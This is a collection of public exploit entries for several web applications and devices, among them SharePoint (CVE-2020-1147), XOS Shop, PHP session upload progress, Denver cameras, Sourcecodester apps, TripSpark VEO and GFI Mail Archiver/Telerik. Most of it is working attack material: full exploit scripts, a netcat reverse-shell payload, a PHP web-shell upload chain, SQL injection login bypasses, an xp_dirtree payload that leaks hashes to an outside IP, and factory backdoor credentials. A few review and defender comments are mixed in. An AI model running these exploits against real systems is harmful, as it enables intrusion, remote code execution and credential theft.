        """Enable wire-level HTTP debugging and DEBUG logging for urllib3.

        NOTE(review): http.client's debuglevel echoes request headers, which
        here include the Authorization header, to stdout -- confirm before
        sharing debug output.  Returns ``self``.
        """
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        """Return ``payload`` with all line breaks removed and runs of spaces collapsed to one."""
        payload = payload.replace('\n', '').replace('\r', '')
        while '  ' in payload:
            payload = payload.replace('  ', ' ')
        return payload

    def get_form(self):
        """GET the target page and scrape its hidden form fields into ``form_values``.

        Returns the response.  Not called by ``send_payload`` (see the
        commented-out line there).
        """
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        """POST the cleaned DataSet in ``__SUGGESTIONSCACHE__`` to ``control_path``.

        ``__viewstate`` is sent empty.  Returns the response; the caller
        inspects its status code and ``MicrosoftSharePointTeamServices`` header.
        """
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
        parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
        parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
        parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
        # NOTE(review): "-both" and "-debug" use action='store' with a False
        # default, so any value typed on the command line (even the string
        # "False") is truthy; action='store_true' would match the help text.
        parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
        parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
        parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')

        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()

        exp = Exploit(
            proxy_address=options.proxy,
            username=options.username,
            domain=options.domain,
            password=options.password,
            target=options.target
        )

        if options.debug:
            exp.debug()
            # NOTE(review): this line writes the cleartext password to stdout.
            stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
                options.target, options.username, options.domain, options.password, options.debug, options.proxy
            ))

        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
        # A non-200 on quicklinks.aspx is retried once on the dialog-form page
        # when -both was given.
        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)

    # NOTE(review): every failure (argument, network, parsing) is reduced to a
    # one-line message here and the traceback is discarded.
    except Exception as error:
        stderr.write('error in main %s' % str(error))
            
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://xos-shop.com
# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9
# Version: 1.0.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1


################
# Description  #
################

# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.


##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php
Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php

Steps to Reproduce:

1. Login as admin
2. Goto Catalog > Manufacturers > edit any manufacturer
3. Upload any image as "Manufacturers Image" and click save button
4. Then, tick "Delete" checkbox and click save button
5. Intercept the request and replace the existing image name with the path of any file on the server via the "current_manufacturer_image" parameter.

# Assumed there is a backup.conf file in web root

PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root

Request: 
========

POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678
Content-Length: 1305
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[2]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[1]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[3]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[2]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[1]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[3]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="delete_manufacturer_image"

true
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="current_manufacturer_image"

../../backup.conf
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_image"; filename=""
Content-Type: application/octet-stream

-----------------------------120849309142309531191692203678--

---


##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php
Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php
Note: Multiple parameters affected

Steps to Reproduce:

1. Login as admin
2. Goto Catalog > Categories/Products > edit any category
3. If there is no existing image, upload any image as "Category Image" and click the save button; otherwise,
4. Tick "Delete" checkbox and click save button
5. Intercept the request and replace the existing image name with the path of any file on the server via the "current_category_image" parameter.

# Assumed there is a backup.conf file in web root

PoC #2) param current_category_image - Deleting backup.conf file in web root

Request: 
========

POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599
Content-Length: 2524
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_id"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_category_image"

../../../backup.conf
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="category_name"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_categories_or_pages_status"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="delete_category_image"

true
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_image"; filename=""
Content-Type: application/octet-stream

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="product_list_b"

0
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="sort_order"

10
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_status"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[2]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[1]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[3]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[2]"

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[1]"

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[3]"

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[2]"

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[1]"

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[3]"

-----------------------------95672159210084798032704634599--

---


# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1
# The affected version is prior to v1.0.9.
            
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This PoC abuses PHP_SESSION_UPLOAD_PROGRESS and then triggers a race condition to obtain remote code execution; the script returns a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :

python3 poc.py <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337

"""
import requests
import threading
import datetime
import sys

# Start-up timestamp and the deadline (ten seconds later) that every worker
# thread checks before sending another request.
x = datetime.datetime.now()
addSeconds = datetime.timedelta(seconds=10)
newDatetime = addSeconds + x

def fuzz():
	"""Worker body: repeatedly POST the upload-progress request until the deadline.

	Reads the target URL, listener IP and listener port from ``sys.argv``
	(checked for presence by the ``__main__`` guard) and loops until
	``newDatetime``, set at import time ten seconds after start-up, has
	passed.  Each iteration opens a fresh ``requests.Session`` and sends a
	multipart POST whose ``PHP_SESSION_UPLOAD_PROGRESS`` field carries the PHP
	snippet and whose ``lfi`` query parameter names the session file for the
	fixed ``PHPSESSID`` value; presumably the race is between PHP writing the
	progress data into that file and the target including it.

	Defender notes: ``session.upload_progress.enabled=0`` removes the
	primitive, and the traffic is distinctive -- a fixed ``PHPSESSID``
	(``SiLvER``), an upload field named ``PHP_SESSION_UPLOAD_PROGRESS``
	containing ``<?php``, and a query parameter pointing at
	``/var/lib/php/sessions/``.
	"""
	targetIP = sys.argv[1]
	listnerIP = sys.argv[2]
	listnerPORT = sys.argv[3]
	# Only read below, so the global declaration is not strictly needed.
	global newDatetime
	while True:
		try:
			# SystemExit raised inside a worker thread ends just that thread.
			if datetime.datetime.now() > newDatetime:
				exit()
			# proxies = {
			#     "http": "http://127.0.0.1:8080",
			#    	"https": "https://127.0.0.1:8080",
			#    	}
			sessionName = "SiLvER"
			url = targetIP
			s = requests.Session()
			cookies = {'PHPSESSID': sessionName}
			files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
			# You need to change the parameter in your case , here the vulnerable parameter is (lfi)
			params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
			# Redirects are not followed and TLS verification is off; the
			# response is not inspected.
			x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
		
		except Exception as error:
			# Any request failure ends this worker after printing the error.
			print(error)
			exit()
def main():
	"""Print a banner and launch 20 concurrent fuzz() worker threads.

	Each thread runs fuzz() until the module-level deadline. Note that the
	final loop evaluates `thread.join` as an attribute lookup without
	calling it, so nothing is awaited here; the process stays alive only
	because the (non-daemon) worker threads are still running.
	"""
	print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
	threads = []
	for _ in range(20):
		t = threading.Thread(target=fuzz)
		t.start()
		threads.append(t)
	for thread in threads:
		thread.join

if __name__ == "__main__":
    # Three positional arguments are required: target URL, listener IP, listener port.
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()  
    else:
    	main()
            
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150

A backdoor was found in the Denver SHC-150 Smart Wifi Camera. Other models may have this backdoor too.

The backdoor is a factory telnet credential - `default`. Just open a telnet connection to the camera on port 23 and enter `default` (yes, on these cameras the telnet service is served on port 23). After this, you'll get a Linux shell. The backdoor allows an attacker to execute commands at the OS level through telnet.

PoC:

```
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.

goke login: default
$ ls /
bin      home     linuxrc  opt      run      tmp
dev      init     media    proc     sbin     usr
etc      lib      mnt      root     sys      var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```
            
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
 
import os, re, sys, argparse, requests
from termcolor import cprint

def banner():
    """Clear the terminal and print the tool's ASCII-art banner.

    `cls` is the Windows clear-screen command and is run through the
    shell; on other platforms the command is simply not found and the
    return value of os.system() is ignored, so only the banner is printed.
    """
    os.system("cls")
    print('''
    ___________                    __   
    \_   _____/__  __ ____   _____/  |_ 
     |    __)_\  \/ // __ \ /    \   __\\
     |        \\\\   /\  ___/|   |  \  |  
    /_______  / \_/  \___  >___|  /__|  
            \/           \/     \/ 
             Registration System
     --[Authentication Bypass and RCE]--
                @jjavierolmedo
    ''')   

def get_args():
    """Parse the command line.

    Options:
        -t/--target  (required) base URL of the target.
        -p/--proxy   (optional) proxy URL applied to both http and https.

    Returns:
        argparse.Namespace with `target` and `proxy` attributes
        (`proxy` is None when not given).
    """
    cli = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
    cli.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    cli.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
    return cli.parse_args()

def auth_bypass(s, proxies, url):
    """Submit the login form with a SQL-injection username and check the result.

    Args:
        s: requests.Session whose cookie jar will carry the resulting login.
        proxies: proxies mapping handed straight to requests.
        url: the Login.php?f=rlogin endpoint built by main().

    Returns:
        The same session on success. Calls sys.exit(0) when the response
        body does not contain the literal '{"status":"success"}'.

    Server-side root cause is a login query assembled by string
    concatenation; the fix is a parameterized query, not input filtering.
    """
    data = {
        # The quote closes the SQL string literal and '#' comments out the
        # remainder of the query, so the password is never compared.
        "username":"admin'#",
        "password":""
    }

    r = s.post(url, data=data, proxies=proxies)

    # Success is a plain substring match on the JSON body.
    if('{"status":"success"}' in r.text):
        cprint("[+] Authenticacion Bypass Success!\n", "green")
        return s
    else:
        cprint("[-] Authenticacion Bypass Error!\n", "red")
        sys.exit(0)
    
def upload_shell(s, proxies, url):
    """Upload a PHP file through the system-settings update endpoint.

    Args:
        s: authenticated requests.Session returned by auth_bypass().
        proxies: proxies mapping handed to requests.
        url: the SystemSettings.php?f=update_settings endpoint built by main().

    Posts `content` as the `img` form file named cmd.php together with the
    two settings fields the endpoint expects. Success is judged loosely:
    HTTP 200 and the character '1' anywhere in the body.

    Returns:
        The session on success; otherwise calls sys.exit(0).

    Server-side root cause: the settings upload apparently keeps the
    client-supplied extension (get_shell_url() looks for a name ending in
    `_cmd.php`) and stores the file under a web-served directory where PHP
    executes. Mitigations: extension/content allowlist, server-side
    renaming, and disabling script execution for the uploads directory.
    """
    content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
    file = {
        'img':('cmd.php',content)
    }

    data = {
        "name":"Event Registration System with QR Code - PHP",
        "short_name":"ERS-QR-PHP",
    }

    r = s.post(url, files=file, data=data, proxies=proxies)

    # Any body containing a '1' passes this check.
    if('1' in r.text and r.status_code == 200):
        cprint("[+] Upload Shell Success!\n", "green")
        return s
    else:
        cprint("[-] Upload Shell Error!\n", "red")
        sys.exit(0)

def get_shell_url(s, proxies, url):
    """Fetch the uploads directory page and print the URL of the uploaded file.

    Args:
        s: authenticated session.
        proxies: proxies mapping handed to requests.
        url: the /event/uploads/ URL built by main().

    Scrapes the first anchor whose link text follows a `_cmd.php">` match,
    so it presumably relies on directory listing being enabled;
    re.findall(...)[0] raises IndexError when nothing matches. The printed
    URL uses a fixed http://localhost host rather than the --target value.

    Returns:
        None.
    """
    r = s.get(url, proxies=proxies)
    # '\_' is not a recognised str escape (DeprecationWarning) but is kept as written.
    regex = '\_cmd.php"> (.*?)</a></li>'
    shell_name = re.findall(regex, r.text)[0]
    url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
    cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")

def main():
    """Run the chain: banner, argument parsing, login bypass, upload, URL print.

    `proxies` defaults to empty strings (requests then uses no proxy); with
    --proxy both schemes are routed through the given URL. The endpoint
    URLs are built by plain concatenation onto --target, so a trailing
    slash on --target would yield a double slash. get_shell_url() returns
    None, so the final assignment leaves `s` as None.
    """
    banner()
    args = get_args()
    target = args.target
    proxies = {'http':'','https':''}
    if args.proxy:
        proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}

    login_url = target + "/event/classes/Login.php?f=rlogin"
    upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
    shell_url = target + "/event/uploads/"

    s = requests.Session()
    s = auth_bypass(s, proxies, login_url)
    s = upload_shell(s, proxies, upload_url)
    s = get_shell_url(s, proxies, shell_url)
     
if __name__ == "__main__":
    # Ctrl-C is the only handled interruption; any other error propagates with a traceback.
    try:
        main()
    except KeyboardInterrupt:
        cprint("[-] User aborted session\n", "red")
        sys.exit(0)

# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
            
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp

# DESCRIPTION #

# Customer relationship management system is vulnerable to Sql Injection Auth Bypass

# Exploit Working:
# 1. Visit http://localhost/crm/customer/login.php
# 2. You will see the login panel
# 3. Enter the payload ( '=' 'or' ) in the username field and click Sign In; you will be logged into the admin account.

# Vulnerable URL :http://localhost/crm/customer/login.php
# Payload: '=' 'or'
            
# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection
# Google Dork: inhtml:"Student Busing Information" 
# Date: 07/27/2021
# Exploit Author: Sedric Louissaint @L_Kn0w
# Vendor Homepage: https://www.tripspark.com
# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf 
# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084
# OS Tested on: Microsoft Windows Server 2012 R2 Standard
# Vender Notified: 01/19/2021
# Confirmed Patch was released : 06/15/2021

# Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability.

# PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound).

```

POST / HTTP/1.1
Host: vulnerable.site.net
User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4700
Origin: vulnerable.site.net
Connection: close
Referer: https:// vulnerable.site.net 
Cookie: ASP.NET_SessionId=x
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit

```
            
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110

A backdoor was found in the Denver SHO-110 IP Camera. Other models may have this backdoor too.

The backdoor is in the camera's second HTTP service and allows an attacker to retrieve a snapshot through the `/snapshot` endpoint. The camera runs two HTTP services: the first is served on port 80 and requires authentication; the second is served on port 8001 and does not require authentication.

It is possible to write a script that collects snapshots and stitches them together, so the attacker would be able to disclose the camera stream.

PoC:

http://<host>:8001/snapshot
            
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
# Date: 21/03/2021
# Exploit Author: Amin Bohio
# Original Research & Code By: Paul Taylor / Foregenix Ltd
# Original Exploit: https://github.com/bao7uo/RAU_crypto
# Vendor Homepage: https://www.gfi.com
# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver
# Vulnerable Versions: GFI Mail Archiver <= 15.1
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# Tested on: Windows & Linux

# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver

#!/usr/bin/python3

# Original Telerik Exploit Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py

# Modified by: Amin Bohio

import sys
import base64
import json
import re
import requests
import os
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
from Crypto.Hash import SHA1
from struct import Struct
from operator import xor
from itertools import starmap

import binascii

from requests.packages.urllib3.exceptions import InsecureRequestWarning

#   ******************************************
#   ******************************************

# ADVANCED_SETTINGS section 1 of 2
# Warning: the call below suppresses certificate warnings, and
# CERT_VERIFY = False disables certificate verification (passed as verify=False).

# Silence urllib3's InsecureRequestWarning that the verify=False request in
# upload() would otherwise emit on every call.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Passed as `verify=` to requests.Session.send() in upload(). False turns off
# TLS certificate verification entirely, so the operator's own request body is
# exposed to interception; set it to True or a CA-bundle path when the
# target's certificate can be validated.
CERT_VERIFY = False

#   ******************************************
#   ******************************************

class PBKDF:
    """Key-derivation helpers that turn the RadAsyncUpload configuration
    password into 48 bytes of key material (32-byte AES key + IV).

    Two schemes are implemented, selected by RAUCipher.PBKDF_ALGORITHM.
    The methods are written without `self`/`@staticmethod` and are always
    called through the class (PBKDF.sha1(...)), which works because a plain
    function looked up on a class is just a function in Python 3. derive2()
    parks its HMAC object on the class attribute PBKDF.mac, so the class
    holds mutable shared state and is not safe to use concurrently.
    """

    def sha1(v: bytes) -> bytes:
        # Single raw SHA-1 digest of v.
        hl = SHA1.new()
        hl.update(v)
        return hl.digest()

    def derive1(password: str, salt: str) -> bytes:
        # Scheme 1: hash password+salt 99 times in the loop plus once more
        # below (100 SHA-1 applications), then extend the 20-byte digest to
        # at least 48 bytes with SHA-1("<counter>" + hash) blocks.
        # NOTE(review): this looks like .NET PasswordDeriveBytes (PBKDF1-style)
        # rather than standard PBKDF2 — confirm against the component before
        # reusing it elsewhere.
        hash = (password + salt).encode()
        for i in range(0, 99):
            hash = PBKDF.sha1(hash)

        result = PBKDF.sha1(hash)
        i = 1
        while len(result) < 48:
            result += PBKDF.sha1(str(i).encode() + hash)
            i += 1

        return result

    def hmacsha1(v: bytes) -> bytearray:
        # HMAC-SHA1 of v under the key stored in PBKDF.mac by derive2();
        # copy() so the shared object is never advanced.
        hl = PBKDF.mac.copy()
        hl.update(v)
        return bytearray(hl.digest())


    def derive2(password: str, salt: str) -> bytes:
        # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py
        # Scheme 2: PBKDF2-HMAC-SHA1, 1000 iterations (one initial call plus
        # 999 in the loop), big-endian 32-bit block counter, 48 bytes out.
        result_length = 48
        PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new())
        result = []
        for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1):
            rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b))
            for i in range(999):
                u = PBKDF.hmacsha1(u)
                # rv becomes a lazy chain of xor generators; it is only
                # evaluated by result.extend() below.
                rv = starmap(xor, zip(rv, u))
            result.extend(rv)
        # Equivalent to bytes(result)[:result_length].
        result = b''.join(map(bytes, [result]))[:result_length]
        return result

    def derive(type: int, password: str, salt: str = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])) -> tuple[bytes, bytes]:
        """Return (key, iv) for *password* using scheme *type* (1 or 2).

        The default salt is the fixed 13-character string above. Any other
        *type* leaves `result` unassigned and raises UnboundLocalError.
        """
        if type == 1:
            result = PBKDF.derive1(password, salt)
            # Re-slices the 48+ bytes into 32+8+8 — presumably mirroring how
            # the component lays out key and IV; origin of the quirk unknown.
            result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack
        elif type == 2:
            result = PBKDF.derive2(password, salt)

        return result[0:32], result[32:]


class RAUCipher:
    """AES-CBC (plus optional HMAC) wrapper reproducing the encoding
    RadAsyncUpload applies to its rauPostData fields.

    The two key strings below are the component's hard-coded defaults for
    versions before the 2017 patches (per the comments). A deployment that
    still uses them lets anyone who knows the defaults produce a
    configuration the server accepts as genuine — the weakness described
    by the advisories in the file header. Defensive action is to upgrade
    and/or set installation-specific keys as the vendor advisory directs.

    Methods are plain functions called through the class (no `self`).
    """


#   ******************************************
#   ******************************************

    # ADVANCED_SETTINGS section 2 of 2

    # Default settings are for vulnerable versions before 2017 patches with default keys

    T_Upload_ConfigurationHashKey = \
        "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches
    HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey

    T_AsyncUpload_ConfigurationEncryptionKey = \
        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches
    PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password

    # Latest tested version working with this setting: 2018.1.117
    # Probably working up to and including 2018.3.910
    PBKDF_ALGORITHM = 1

    # Earliest tested version working with this setting: 2019.2.514
    # Probably introduced 2019.1.115
#    PBKDF_ALGORITHM = 2

#   ******************************************
#   ******************************************

    # Key material is derived once, when the class body executes:
    # 32-byte AES key, remainder used as the (static) CBC IV.
    key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD)

#    print(binascii.hexlify(key).decode().upper())
#    print(binascii.hexlify(iv).decode().upper())

    def encrypt(plaintext):
        """Return base64(AES-CBC(key, iv, pad(widen(plaintext)))).

        widen: a NUL byte follows every character, i.e. UTF-16LE for ASCII
        input (non-ASCII characters go through .encode() as multi-byte
        UTF-8, so the result is not true UTF-16LE for them). pad: PKCS#7
        to a 16-byte multiple. Because the IV is fixed, equal plaintexts
        always yield equal ciphertexts. Progress goes to stderr.
        """
        sys.stderr.write("Encrypting... ")
        encoded = ""
        for i in plaintext:
            encoded = encoded + i + "\x00"
        plaintext = encoded + (
                                chr(16 - (len(encoded) % 16)) *
                                (16 - (len(encoded) % 16))
                            )
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        sys.stderr.write("done\n")
        return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()


    def decrypt(ciphertext):
